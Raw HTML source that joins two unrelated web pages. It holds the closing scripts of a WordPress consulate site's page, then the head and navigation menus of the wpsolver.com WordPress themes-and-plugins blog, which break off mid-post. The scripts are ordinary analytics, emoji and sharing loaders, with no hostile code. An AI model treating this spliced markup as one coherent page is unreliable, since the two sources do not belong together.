src='http://egyconsulatela.com/wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/section/static/js/background.init.js?ver=4.9.10'></script> <script type='text/javascript' src='http://egyconsulatela.com/wp-content/themes/philanthropy-parent/framework-customizations/extensions/shortcodes/shortcodes/latest-posts/static/js/scripts.js?ver=2.0.15'></script> <script type='text/javascript' src='http://egyconsulatela.com/wp-includes/js/underscore.min.js?ver=1.8.3'></script> <script type='text/javascript' src='http://egyconsulatela.com/wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/calendar/static/libs/bootstrap3/js/bootstrap.min.js?ver=2.7.12'></script> <script type='text/javascript' src='http://egyconsulatela.com/wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/calendar/static/libs/jstimezonedetect/jstz.min.js?ver=2.7.12'></script> <script type='text/javascript' src='http://egyconsulatela.com/wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/calendar/static/js/calendar.js?ver=2.7.12'></script> <script type='text/javascript'> /* <![CDATA[ */ var fwShortcodeCalendarLocalize = {"event":"Event","events":"Events","today":"Today","locale":"en_US"}; var calendar_languages = {"en_US":{"error_noview":"Calendar: View {0} not found","error_dateformat":"Calendar: Wrong date format {0}. Should be either \"now\" or \"yyyy-mm-dd\"","error_loadurl":"Calendar: Event URL is not set","error_where":"Calendar: Wrong navigation direction {0}. Can be only \"next\" or \"prev\" or \"today\"","error_timedevide":"Calendar: Time split parameter should divide 60 without decimals. Something like 10, 15, 30","no_events_in_day":"No events in this day.","title_year":"{0}","title_month":"{0} {1}","title_week":"week {0} of {1}","title_day":"{0} {1} {2}, {3}","week":"Week {0}","all_day":"All day","time":"Time","events":"Events","before_time":"Ends before timeline","after_time":"Starts after timeline","m0":"January","m1":"February","m2":"March","m3":"April","m4":"May","m5":"June","m6":"July","m7":"August","m8":"September","m9":"October","m10":"November","m11":"December","ms0":"Jan","ms1":"Feb","ms2":"Mar","ms3":"Apr","ms4":"May","ms5":"Jun","ms6":"Jul","ms7":"Aug","ms8":"Sep","ms9":"Oct","ms10":"Nov","ms11":"Dec","d0":"Sun","d1":"Mon","d2":"Tue","d3":"Wed","d4":"Thu","d5":"Fri","d6":"Sat"}}; var fwShortcodeCalendarLocalize = {"event":"Event","events":"Events","today":"Today","locale":"en_US"}; var calendar_languages = {"en_US":{"error_noview":"Calendar: View {0} not found","error_dateformat":"Calendar: Wrong date format {0}. Should be either \"now\" or \"yyyy-mm-dd\"","error_loadurl":"Calendar: Event URL is not set","error_where":"Calendar: Wrong navigation direction {0}. Can be only \"next\" or \"prev\" or \"today\"","error_timedevide":"Calendar: Time split parameter should divide 60 without decimals. Something like 10, 15, 30","no_events_in_day":"No events in this day.","title_year":"{0}","title_month":"{0} {1}","title_week":"week {0} of {1}","title_day":"{0} {1} {2}, {3}","week":"Week {0}","all_day":"All day","time":"Time","events":"Events","before_time":"Ends before timeline","after_time":"Starts after timeline","m0":"January","m1":"February","m2":"March","m3":"April","m4":"May","m5":"June","m6":"July","m7":"August","m8":"September","m9":"October","m10":"November","m11":"December","ms0":"Jan","ms1":"Feb","ms2":"Mar","ms3":"Apr","ms4":"May","ms5":"Jun","ms6":"Jul","ms7":"Aug","ms8":"Sep","ms9":"Oct","ms10":"Nov","ms11":"Dec","d0":"Sun","d1":"Mon","d2":"Tue","d3":"Wed","d4":"Thu","d5":"Fri","d6":"Sat"}}; /* ]]> */ </script> <script type='text/javascript' src='http://egyconsulatela.com/wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/calendar/static/js/scripts.js?ver=2.7.12'></script> <script type='text/javascript' src='http://egyconsulatela.com/wp-includes/js/wp-embed.min.js?ver=4.9.10'></script> <script type='text/javascript' src='http://egyconsulatela.com/wp-content/plugins/wp-responsive-recent-post-slider/assets/js/slick.min.js?ver=1.4.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var Wppsac = {"is_mobile":"0","is_rtl":"0"}; /* ]]> */ </script> <script type='text/javascript' src='http://egyconsulatela.com/wp-content/plugins/wp-responsive-recent-post-slider/assets/js/wppsac-public.js?ver=1.4.1'></script> </body> </html>
0
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"> <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <link rel="stylesheet" href="https://www.wpsolver.com/wp-content/themes/thesis_189/custom/layout.css" type="text/css" media="screen, projection" /> <!--[if lte IE 8]><link rel="stylesheet" href="https://www.wpsolver.com/wp-content/themes/thesis_189/lib/css/ie.css" type="text/css" media="screen, projection" /><![endif]--> <link rel="stylesheet" href="https://www.wpsolver.com/wp-content/themes/thesis_189/custom/custom.css" type="text/css" media="screen, projection" /> <link rel="shortcut icon" href="https://www.wpsolver.com/wp-content/uploads/2017/12/16/favicon.ico" /> <link rel="alternate" type="application/rss+xml" title="WP Solver RSS Feed" href="https://www.wpsolver.com/feed/" /> <link rel="pingback" href="https://www.wpsolver.com/xmlrpc.php" /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.wpsolver.com/xmlrpc.php?rsd" /> <meta name="p:domain_verify" content="6f5fa3fab3301f6e1e8dd18e532d16a1"/> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-565484-12', 'auto'); ga('send', 'pageview'); </script> <!-- This site is optimized with the Yoast SEO plugin v11.2 - https://yoast.com/wordpress/plugins/seo/ --> <title>Best WordPress Themes, WP Plugins, Tips @ WP Solver</title> <meta name="description" content="WPSolver covers the latest WordPress themes, plugins, and WP tips"/> <link rel="canonical" href="https://www.wpsolver.com/" /> <link rel="next" href="https://www.wpsolver.com/page/2/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Best WordPress Themes, WP Plugins, Tips @ WP Solver" /> <meta property="og:description" content="WPSolver covers the latest WordPress themes, plugins, and WP tips" /> <meta property="og:url" content="https://www.wpsolver.com/" /> <meta property="og:site_name" content="WP Solver" /> <meta property="fb:app_id" content="435748109815795" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:description" content="WPSolver covers the latest WordPress themes, plugins, and WP tips" /> <meta name="twitter:title" content="Best WordPress Themes, WP Plugins, Tips @ WP Solver" /> <meta name="twitter:site" content="@wpblackbelt" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://www.wpsolver.com/#organization","name":"","url":"https://www.wpsolver.com/","sameAs":["https://www.facebook.com/pages/WP-Jedi/112424432105444","https://twitter.com/wpblackbelt"]},{"@type":"WebSite","@id":"https://www.wpsolver.com/#website","url":"https://www.wpsolver.com/","name":"WP Solver","publisher":{"@id":"https://www.wpsolver.com/#organization"},"potentialAction":{"@type":"SearchAction","target":"https://www.wpsolver.com/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"WebPage","@id":"https://www.wpsolver.com/#webpage","url":"https://www.wpsolver.com/","inLanguage":"en-US","name":"Best WordPress Themes, WP Plugins, Tips @ WP Solver","isPartOf":{"@id":"https://www.wpsolver.com/#website"},"about":{"@id":"https://www.wpsolver.com/#organization"},"description":"WPSolver covers the latest WordPress themes, plugins, and WP tips"}]}</script> <!-- / Yoast SEO plugin. --> <link rel="amphtml" href="https://www.wpsolver.com/amp/" /><meta name="generator" content="AMP for WP 0.9.97.52"/><link rel='dns-prefetch' href='//s0.wp.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.wpsolver.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://www.wpsolver.com/wp-includes/css/dist/block-library/style.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='arpw-style-css' href='https://www.wpsolver.com/wp-content/plugins/advanced-random-posts-widget/assets/css/arpw-frontend.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='addtoany-css' href='https://www.wpsolver.com/wp-content/plugins/add-to-any/addtoany.min.css?ver=1.15' type='text/css' media='all' /> <link rel='stylesheet' id='jetpack_css-css' href='https://www.wpsolver.com/wp-content/plugins/jetpack/css/jetpack.css?ver=7.3.1' type='text/css' media='all' /> <script>if (document.location.protocol != "https:") {document.location = document.URL.replace(/^http:/i, "https:");}</script><script type='text/javascript' src='https://www.wpsolver.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://www.wpsolver.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://www.wpsolver.com/wp-content/plugins/add-to-any/addtoany.min.js?ver=1.1'></script> <link rel='https://api.w.org/' href='https://www.wpsolver.com/wp-json/' /> <script data-cfasync="false"> window.a2a_config=window.a2a_config||{};a2a_config.callbacks=[];a2a_config.overlays=[];a2a_config.templates={}; a2a_config.counts = { recover_protocol: 'http' }; (function(d,s,a,b){a=d.createElement(s);b=d.getElementsByTagName(s)[0];a.async=1;a.src="https://static.addtoany.com/menu/page.js";b.parentNode.insertBefore(a,b);})(document,"script"); </script> <style data-context="foundation-flickity-css">/*! Flickity v2.0.2 http://flickity.metafizzy.co ---------------------------------------------- */.flickity-enabled{position:relative}.flickity-enabled:focus{outline:0}.flickity-viewport{overflow:hidden;position:relative;height:100%}.flickity-slider{position:absolute;width:100%;height:100%}.flickity-enabled.is-draggable{-webkit-tap-highlight-color:transparent;tap-highlight-color:transparent;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.flickity-enabled.is-draggable .flickity-viewport{cursor:move;cursor:-webkit-grab;cursor:grab}.flickity-enabled.is-draggable .flickity-viewport.is-pointer-down{cursor:-webkit-grabbing;cursor:grabbing}.flickity-prev-next-button{position:absolute;top:50%;width:44px;height:44px;border:none;border-radius:50%;background:#fff;background:hsla(0,0%,100%,.75);cursor:pointer;-webkit-transform:translateY(-50%);transform:translateY(-50%)}.flickity-prev-next-button:hover{background:#fff}.flickity-prev-next-button:focus{outline:0;box-shadow:0 0 0 5px #09f}.flickity-prev-next-button:active{opacity:.6}.flickity-prev-next-button.previous{left:10px}.flickity-prev-next-button.next{right:10px}.flickity-rtl .flickity-prev-next-button.previous{left:auto;right:10px}.flickity-rtl .flickity-prev-next-button.next{right:auto;left:10px}.flickity-prev-next-button:disabled{opacity:.3;cursor:auto}.flickity-prev-next-button svg{position:absolute;left:20%;top:20%;width:60%;height:60%}.flickity-prev-next-button .arrow{fill:#333}.flickity-page-dots{position:absolute;width:100%;bottom:-25px;padding:0;margin:0;list-style:none;text-align:center;line-height:1}.flickity-rtl .flickity-page-dots{direction:rtl}.flickity-page-dots .dot{display:inline-block;width:10px;height:10px;margin:0 8px;background:#333;border-radius:50%;opacity:.25;cursor:pointer}.flickity-page-dots .dot.is-selected{opacity:1}</style><style data-context="foundation-slideout-css">.slideout-menu{position:fixed;left:0;top:0;bottom:0;right:auto;z-index:0;width:256px;overflow-y:auto;-webkit-overflow-scrolling:touch;display:none}.slideout-menu.pushit-right{left:auto;right:0}.slideout-panel{position:relative;z-index:1;will-change:transform}.slideout-open,.slideout-open .slideout-panel,.slideout-open body{overflow:hidden}.slideout-open .slideout-menu{display:block}.pushit{display:none}</style><style type='text/css'>img#wpstats{display:none}</style><meta name="google-site-verification" content="KSNTg9Uce41YVUXHHeTYRLxe2C5Wq8C1OUb0YMi0SLw" /> <link href="https://plus.google.com/103662190588257705563" rel="publisher" /><script type="text/javascript"> window.___gcfg = {lang: 'en'}; (function() {var po = document.createElement("script"); po.type = "text/javascript"; po.async = true;po.src = "https://apis.google.com/js/plusone.js"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(po, s); })();</script> <link media="screen, projection" type="text/css" href="https://www.wpsolver.com/wp-content/themes/thesis_189/custom/skins/thesisplay/base.css" rel="stylesheet" /> <style type="text/css"> .custom #header #logo a { text-decoration: none; background: url(https://www.wpsolver.com/logowp.png) no-repeat; height: 55px; width: 300px; text-indent: -9999px; display: block; outline: none; } </style> <link media="screen, projection" type="text/css" href="https://www.wpsolver.com/wp-content/themes/thesis_189/custom/skins/thesisplay/themes/black.css" rel="stylesheet" /> <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.0/jquery.min.js"></script> <script type="text/javascript" src="https://www.wpsolver.com/wp-content/themes/thesis_189/custom/skins/thesisplay/js/custom.js"></script> <style type="text/css"></style> <style type="text/css"> .synved-social-resolution-single { display: inline-block; } .synved-social-resolution-normal { display: inline-block; } .synved-social-resolution-hidef { display: none; } @media only screen and (min--moz-device-pixel-ratio: 2), only screen and (-o-min-device-pixel-ratio: 2/1), only screen and (-webkit-min-device-pixel-ratio: 2), only screen and (min-device-pixel-ratio: 2), only screen and (min-resolution: 2dppx), only screen and (min-resolution: 192dpi) { .synved-social-resolution-normal { display: none; } .synved-social-resolution-hidef { display: inline-block; } } </style> <style>.ios7.web-app-mode.has-fixed header{ background-color: rgba(2,0,0,.88);}</style> <link rel="stylesheet" type="text/css" id="wp-custom-css" href="https://www.wpsolver.com/?custom-css=7f2831d331" /> </head> <body data-rsssl=1 class="custom"> <div id="header_area" class="full_width"> <div class="page"> <div id="search_bar"> <form method="get" id="search_form" action="https://www.wpsolver.com"> <p> <input class="text_input" type="text" value="To search, type and hit enter" name="s" id="s" onfocus="if (this.value == 'To search, type and hit enter') {this.value = '';}" onblur="if (this.value == '') {this.value = 'To search, type and hit enter';}" /> <input type="submit" id="searchsubmit" value="Search" /> </p> </form> </div> <div id="header"> <p id="logo"><a href="https://www.wpsolver.com">WP Solver</a></p> <h1 id="tagline">Slay your WordPress Demons!</h1> </div> </div> </div> <div id="navigation_area" class="full_width"> <div class="page"> <div class="menu-top-container"><ul id="menu-top" class="menu"><li id="menu-item-15495" class="titleone menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home current-menu-ancestor current-menu-parent menu-item-has-children menu-item-15495"><a href="https://www.wpsolver.com/#starthere" aria-current="page">Start Here!</a> <ul class="sub-menu"> <li id="menu-item-30643" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-30643"><a href="https://www.wpsolver.com/optimize-wordpress-speed/">WP Speed Optimization</a></li> <li id="menu-item-15506" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-has-children menu-item-15506"><a href="https://www.wpsolver.com/#themes" aria-current="page">Find a Theme</a> <ul class="sub-menu"> <li id="menu-item-15523" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15523"><a href="https://www.wpsolver.com/classified-solutions-for-wordpress/">Classified Themes</a></li> <li id="menu-item-15513" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15513"><a href="https://www.wpsolver.com/3-best-job-board-wordpress-themes/">Job Board Themes</a></li> <li id="menu-item-15510" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15510"><a href="https://www.wpsolver.com/wordpress-themes-for-app-sites/">Themes for Apps</a></li> <li id="menu-item-15516" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15516"><a href="https://www.wpsolver.com/best-real-estate-wp-themes/">Real Estate Themes</a></li> <li id="menu-item-15515" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15515"><a href="https://www.wpsolver.com/20-attractive-themes-for-cafes-and-food-businesses/">Restaurant Themes</a></li> <li id="menu-item-15507" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15507"><a href="https://www.wpsolver.com/how-to-clone-popular-sites-with-wordpress-clone-themes/">Clone Themes</a></li> <li id="menu-item-15509" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15509"><a href="https://www.wpsolver.com/themes-for-business-listing-sites/">Themes for Business</a></li> <li id="menu-item-15511" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15511"><a href="https://www.wpsolver.com/10-best-wordpress-themes-for-political-blogs/">Themes for Politics</a></li> <li id="menu-item-15512" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15512"><a href="https://www.wpsolver.com/5-best-celebrity-wordpress-themes/">Themes for Celebrities</a></li> <li id="menu-item-15514" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15514"><a href="https://www.wpsolver.com/wordpress-conference-themes/">Themes for Events</a></li> <li id="menu-item-15508" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15508"><a href="https://www.wpsolver.com/fitness-gym-wordpress-themes/">Themes for Gyms</a></li> </ul> </li> <li id="menu-item-15522" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15522"><a href="https://www.wpsolver.com/advanced-web-hosts-for-wordpress/">Find WP Hosts</a></li> <li id="menu-item-15518" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-15518"><a href="https://www.wpsolver.com/make-wordpress-mobile-friendly/">WP Mobile Tips</a> <ul class="sub-menu"> <li id="menu-item-15519" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15519"><a href="https://www.wpsolver.com/make-wordpress-smartphone-and-tablet-friendly/">WP for Smartphones</a></li> <li id="menu-item-15520" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15520"><a href="https://www.wpsolver.com/mobile-themes-plugins-for-wordpress/">Mobile Themes</a></li> </ul> </li> <li id="menu-item-15504" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15504"><a href="https://www.wpsolver.com/troubleshooting-fixing-hacked-wordpress-sites/">Hacked Site?</a></li> <li id="menu-item-15501" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-15501"><a href="https://www.wpsolver.com/ways-to-keep-wordpress-secure/">WordPress Security</a> <ul class="sub-menu"> <li id="menu-item-15502" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15502"><a href="https://www.wpsolver.com/malware-code-scanners-for-wordpress/">Malware Scanners</a></li> <li id="menu-item-15503" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15503"><a href="https://www.wpsolver.com/limit-login-attempts-in-wordpress/">Login Protection</a></li> <li id="menu-item-15505" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15505"><a href="https://www.wpsolver.com/scan-wordpress-themes-for-malware-and-exploits-5-plugins/">Theme Scanners</a></li> </ul> </li> <li id="menu-item-15499" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-15499"><a href="https://www.wpsolver.com/make-wordpress-social-media-friendly/">Social Media Tips</a> <ul class="sub-menu"> <li id="menu-item-15497" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15497"><a>Google+ for WordPress</a></li> <li id="menu-item-15498" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15498"><a href="https://www.wpsolver.com/50-best-twitter-wordpress-plugins/">Twitter Plugins</a></li> <li id="menu-item-15500" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15500"><a href="https://www.wpsolver.com/facebook-wordpress-integration/">Facebook Tactics</a></li> </ul> </li> <li id="menu-item-15496" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15496"><a href="https://www.wpsolver.com/youtube-wordpress-integration-15-tactics/">YouTube WP Tips</a></li> <li id="menu-item-8775" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-8775"><a href="https://www.wpsolver.com/category/wordpress-tips/">WordPress Tips</a> <ul class="sub-menu"> <li id="menu-item-8850" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8850"><a href="https://www.wpsolver.com/best-cheat-sheets-for-wordpress-developers/">Cheat Sheets</a></li> <li id="menu-item-8849" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8849"><a href="https://www.wpsolver.com/400-essential-wordpress-plugins-roundup/">Plugins Roundup</a></li> <li id="menu-item-8858" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8858"><a href="https://www.wpsolver.com/security-anti-hack-wordpress-plugins/">WordPress Security</a></li> </ul> </li> </ul> </li> <li id="menu-item-8774" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-8774"><a href="https://www.wpsolver.com/category/wordpress-themes/">WordPress Themes</a> <ul class="sub-menu"> <li id="menu-item-20704" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-20704"><a href="https://www.wpsolver.com/best-genesis-child-themes/">Business Themes</a> <ul class="sub-menu"> <li id="menu-item-20712" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-20712"><a href="https://www.wpsolver.com/themes-for-activists/">Activism Themes</a></li> <li id="menu-item-20710" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-20710"><a href="https://www.wpsolver.com/one-page-app-landing-page/">App Themes</a></li> <li id="menu-item-20714" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-20714"><a href="https://www.wpsolver.com/wordpress-themes-for-pet-sites/">Construction Themes</a></li> <li id="menu-item-20708" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-20708"><a href="https://www.wpsolver.com/medical-health-themes-for-woocommerce/">Health Themes</a></li> <li id="menu-item-20709" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-20709"><a href="https://www.wpsolver.com/themes-for-job-search/">Job Search Themes</a></li> <li id="menu-item-20705" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-20705"><a href="https://www.wpsolver.com/themes-for-car-repair-shops/">Themes for Mechanics</a></li> <li id="menu-item-20707" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-20707"><a href="https://www.wpsolver.com/micro-job-sites-themes/">Micro Job Themes</a></li> <li id="menu-item-20713" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-20713"><a href="https://www.wpsolver.com/animal-care-pet-adoption/">Pet Adoption Themes</a></li> <li id="menu-item-20711" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-20711"><a href="https://www.wpsolver.com/wordpress-themes-for-schools/">Themes for Schools</a></li> <li id="menu-item-20706" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-20706"><a href="https://www.wpsolver.com/themes-for-web-hosts/">Web Hosting Themes</a></li> </ul> </li> <li id="menu-item-8853" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8853"><a href="https://www.wpsolver.com/45-premium-corporate-wordpress-themes/">Corporate Themes</a></li> <li id="menu-item-8855" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8855"><a href="https://www.wpsolver.com/best-e-commerce-themes/">E-commerce Themes</a></li> <li id="menu-item-8782" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8782"><a href="https://www.wpsolver.com/category/wordpress-themes/themes-for-personal-blogs/">For Personal Blogs</a></li> <li id="menu-item-8854" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8854"><a href="https://www.wpsolver.com/hotel-wordpress-themes/">Hotel Themes</a></li> <li id="menu-item-8783" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8783"><a href="https://www.wpsolver.com/category/wordpress-themes/themes-for-pro-bloggers/">Pro Blogger Themes</a></li> <li id="menu-item-8784" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8784"><a href="https://www.wpsolver.com/category/wordpress-themes/themes-for-real-estate-pros/">Real Estate Themes</a></li> <li id="menu-item-8852" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8852"><a href="https://www.wpsolver.com/wordpress-themes-for-entrepreneurs/">Startup Themes</a></li> <li id="menu-item-8785" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8785"><a href="https://www.wpsolver.com/category/wordpress-themes/themes-for-video-bloggers/">Video Blogging Themes</a></li> <li id="menu-item-8781" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8781"><a href="https://www.wpsolver.com/category/wordpress-themes/themes-for-businesses/">WP for Business</a></li> </ul> </li> <li id="menu-item-8856" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8856"><a href="https://www.wpsolver.com/wordpress-seo-toolbox-80-best-seo-plugins/">WordPress SEO Tips</a></li> <li id="menu-item-8851" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8851"><a href="https://www.wpsolver.com/must-have-wordpress-plugins/">Infographics</a></li> <li id="menu-item-8773" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-8773"><a href="https://www.wpsolver.com/category/wordpress-plugins/">Plugins</a> <ul class="sub-menu"> <li id="menu-item-8779" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8779"><a href="https://www.wpsolver.com/category/wordpress-plugins/backup-plugins/">Backup Plugins</a></li> <li id="menu-item-8780" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8780"><a href="https://www.wpsolver.com/category/wordpress-plugins/hack-prevention/">Hack Prevention</a></li> <li id="menu-item-8857" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8857"><a href="https://www.wpsolver.com/best-social-media-wordpress-plugins/">Social media plugins</a></li> </ul> </li> <li id="menu-item-8777" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-8777"><a href="https://www.wpsolver.com/contact-me/">Contact Us</a> <ul class="sub-menu"> <li id="menu-item-15488" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-15488"><a href="https://www.wpsolver.com/our-reviews/">Our Reviews</a></li> <li id="menu-item-19065" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-19065"><a href="https://www.wpsolver.com/credits/">Credits</a></li> </ul> </li> <li id="menu-item-8776" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-8776"><a href="https://www.wpsolver.com/disclaimer/">Disclaimer</a> <ul class="sub-menu"> <li id="menu-item-8778" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8778"><a href="https://www.wpsolver.com/about/">About WP Jedi</a></li> <li id="menu-item-15483" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-15483"><a href="https://www.wpsolver.com/terms-of-use/">Terms of Use</a></li> <li id="menu-item-15484" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-15484"><a href="https://www.wpsolver.com/privacy-policy/">Privacy Policy</a></li> </ul> </li> <li id="menu-item-15485" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-15485"><a href="https://www.wpsolver.com/support-us/">Support Us</a></li> </ul></div> </div> </div> <div id="content_area" class="full_width"> <div class="page"> <div id="content_box"> <div id="content" class="hfeed"> <a rel='nofollow' href='https://www.memberpress.com/exxponentllc/payments-728' target='_blank'><img class='promo_left' border='0' src='https://www.wpsolver.com/wp-content/uploads/2016/09/11/membershippress.png' width='570'></a> <div class="post_box top post-30839 post type-post status-publish format-standard has-post-thumbnail hentry category-plugin-lists tag-domain-mapping" id="post-30839"> <div class="headline_area"> <h2 class="entry-title"><a href="https://www.wpsolver.com/multiple-domain-mapping-plugins/" rel="bookmark" title="Permanent link to 2 Multiple Domain Mapping Plugins for WordPress">2 Multiple Domain Mapping Plugins for WordPress</a></h2> </div> <div class="format_text entry-content"> <p class="headline_meta" /> <small>May 16th in <a href="https://www.wpsolver.com/category/wordpress-plugins/plugin-lists/" rel="category tag">Plugin Lists</a> by <a href="https://www.wpsolver.com/author/wpjedi/" 